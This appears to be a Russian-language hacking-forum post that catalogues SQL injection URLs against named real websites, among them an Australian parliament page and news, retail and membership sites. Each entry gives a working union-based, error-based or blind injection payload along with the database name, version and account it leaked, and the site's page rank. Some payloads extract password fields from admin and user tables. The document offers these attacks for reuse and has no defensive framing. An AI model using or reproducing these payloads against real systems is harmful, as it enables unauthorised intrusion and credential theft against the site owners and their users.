PHP: http://www.liquidhealthinc.com/prodInterior.php?prodID=-32'+union+select+1,concat(database(),char(59),version(),char(59),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+ VERSION : 5.1.53-log DATABASE : liquidhealthdb USER : [email protected] PR - 3 PHP: http://www.ematic.us/product_details.php?prodID=-83+union+select+1,concat(database(),char(59),version(),char(59),user()),3,4,5,6,7,8+--+ VERSION : 5.0.91-log DATABASE : db248448044 USER : [email protected] PR - 4 PHP: http://slyelectronics.com/productdetails.php?prodID=-184+union+select+1,concat(database(),char(59),version(),char(59),user()),3,4,5+--+ VERSION : 5.0.91-log DATABASE : slyelectronics USER : [email protected]
Code: http://www.amvastgoed.nl/index.php?option=com_project&view=project&project_id=-21+UNION+SELECT%20%20+1,2,3,4,5,6,7,8,9,10,11,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,13,14,15,16,17,18,19,20,21,22,23,24-- Username: multidev@localhost Version: 5.0.81Nxs Internet Bv Database: multidev Google PR: 5
PHP: http://www.imobilemedic.com/productDescription.php?prodID=-2+union+select+concat(database(),char(59),version(),char(59),user()),2,3,4,5,6,7,8,9+--+ VERSION : 5.0.91 DATABASE : imobile1_immweb USER : imobile1_immweb@localhost PR - 4 PHP: http://www.mpressbooks.com/profile.php?prodid=-12-988'+union+select+1,2,concat(database(),char(59),version(),char(59),user()),4,5,6,7,8+--+ VERSION : 5.0.51b-log DATABASE : mpressbooks USER : [email protected] PR - 6 ТиЦ - 100
Radio.tut.by tut.by - самый крупный белоруский портал. Code: http://radio.tut.by/area.php?id=-17+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+ 4.0.27-Max-log тИЦ 200 PR 5
PHP: http://www.e-arc.com/site/div_summary.php?mem_id=-144'+union+select+1,2,concat(database(),char(59),version(),char(59),user()),4,5,6,7,8,9,10+--+ VERSION : 5.0.67-community DATABASE : beta_smallfm USER : [email protected] PR - 5 PHP: http://www.psnwa.org/member/portal/view_profile.php?mem_id=-621+union+select+concat(database(),char(59),version(),char(59),user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+ VERSION : 5.1.58-community-log DATABASE : psnwaorg_memberpsnwaorg USER : psnwaorg_admin@localhost PR - 3
сайт парламента Австралии: PR 7 тИЦ - 120 Уязвимость в клиенте БД MS SQL Платформа БД: Microsoft SQL Server 2000 - 8.00.818 (Intel X86) May 31 2003 16:08:15 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) Имя БД: ROCRWD Имя Пользователя БД: rocruser Таблицы БД: CowPat_Index CommitteeInformation dtproperties sysconstraints syssegments tblCommittee ... http://www.aph.gov.au/house/committee/report_register/byKeylist.asp?id=1%27+or+1=%28SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+%28%27CowPat_Index%27,%27CommitteeInformation%27,%27dtproperties%27,%27sysconstraints%27,%27syssegments%27%,%27СЛЕДУЮЩАЯ ТАБЛИЦА%27%29%29-- Путь к уязвимому скрипту /house/committee/report_register/byKeylist.asp Эксплойт
Code: http://www.kn.kz/smi.php?id=-1+union+select+concat_ws(0x3a,id,user,u_password)+from+Users_access+--+ 5.0.51a-24+lenny4-log тИЦ 350 PR 3
http://we.e-rubtsovsk.ru/link.php?link=-217+and+1=2+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48+-- 5.1.49-1ubuntu8
Code: http://www.2kaudit.com/smi.php?id=-1190+union+select+1,version(),3+--+ 4.0.27-log 2kaudit-ru:[email protected] тИЦ 475 PR 4
apcadbadmin1@localhost:5.1.44:apca_org_ug bwindidbadmin@localhost:5.1.44:bwinditrust_ug narodbadmin@localhost:naro_go_ug:5.1.44
Bio[GOOGLE]rede.pt PR - 4 Эксплойт Имя Пользователя: webbiorede База Данных: Biorede Платформа: Microsoft SQL Server 2008 (SP1) - 10.0.2775.0 (X64) Apr 30 2010 14:31:04 Copyright (c) 988-2008 Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 6.0 <X64> (Build 6002: Service Pack 2) Другие БД на сервере: ------------------------------------------------------------------------ Jazzportugal.ua.pt PR - 5 Эксплойт Имя Пользователя: webjazz База Данных: jazzportugal Все остальное одно и то же так как эти две БД хранятся на одном сервере, но доступа у них друг к другу нет..
Еще один ср**й хостинг http://www.webconexion.net/documentation/comment.php?article_id=007+or+1+group+by+concat%28%28select%20host+from+mysql.user+WHERE+User=0x726F6F74%29,floor%28rand%280%29*2%29%29%20having%20min%280%29--+&action=new
Музыкальный портал с трафом ~90к уников Инъекция в MySQL 5.1.51 Code: http://www.bis[туц-туц]ound.com/index.php?name=Topics&op=view&id=-70380+union+select+1,2,3,user_password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+slaed_users+where+user_name=%22admin%22
По запросу в Яндексе "куплю мебель" на первом месте http://www.bymebel.ru/salon.php?idf=aaa%27+union+select+NULL,NULL,version%28%29,database%28%29,user%28%29,NULL,NULL,NULL,NULL,NULL,1,2,3,4,5,6,7,8,9,20,1+--+ udb2653 4.0.26-log Uwww2653S@localhost
Blind SQL Inj --- PR 5 Тип БД: MySQL 5 Имя БД: typo3db Имя пользователя: [email protected] ---------------------------------------------------------------------- SQL Inj --- PR 5 Тип БД: MySQL 5.0.45 Имя БД: sog2010 Имя пользователя: [email protected] ---------------------------------------------------------------------- SQL Inj --- PR 6 Тип БД: Microsoft SQL Server 2005
Code: http://www.autoland.com.ua/article.php?id=-19+union+select+concat_ws(0x3a,user(),version(),database()),2+--+ User: autoland_xxx@localhost Version: 5.0.51a-community Database: autoland_xxx PR 4 тИЦ 30 Code: http://www.addinol.de/oilfinder/oil_details.php?id=658 and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1 User: berezovski@localhost Version: 5.0.26 Database: oilfinder1 PR 4 тИЦ 30 Code: http://www.cdr-forum.de/showdvdanbieter.php?ID=-105+union+select+1,concat_ws(0x3a,user(),version(),database())+--+ User: p33794567@localhost Version: 4.0.27-standard Database: db67865067 PR 4 тИЦ 10
Министерство земельных и имущественных отношений... Code: http://mio.bashkortostan.ru/index.php?page=Information&id=1152[COLOR=Red]+union+Select+1,user+from+mysql.user --[/COLOR] version: 4.0.24_Debian-10-log database: mio user: root@localhost PR: 5 / тИЦ: 50
Code: http://www.no2id.net/news/newsletters/newsletter.php?issue=118 and 1=1 [blind] User: no2id@localhost Version: 4.0.24_Debian-10sarge3-log Database: no2id PR 6 тИЦ 20 Code: http://www.balh.co.uk/eventsbooking_form.php?id=77 and 1=1 [blind] User: [email protected] Version: 4.0.27-max-log Database: db137413126 PR 5 тИЦ 10 Code: http://www.historytoherstory.org.uk/subject.php?id=287 and 1=1 [blind] User: highplace@localhost Version: 3.23.56 Database: highplacedb PR 5 тИЦ 10 Code: http://www.simshare.org.uk/project.php?id=85%20and%201=1 [blind] User: ukcle_dbadmin@localhost Version: 5.1.52 Database: ukcle_oer PR 4
Срослось http://www.discovery.org/scripts/viewDB/index.php?command=view&printerFriendly=true&id=-1783+union+select+user%28%29,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--+
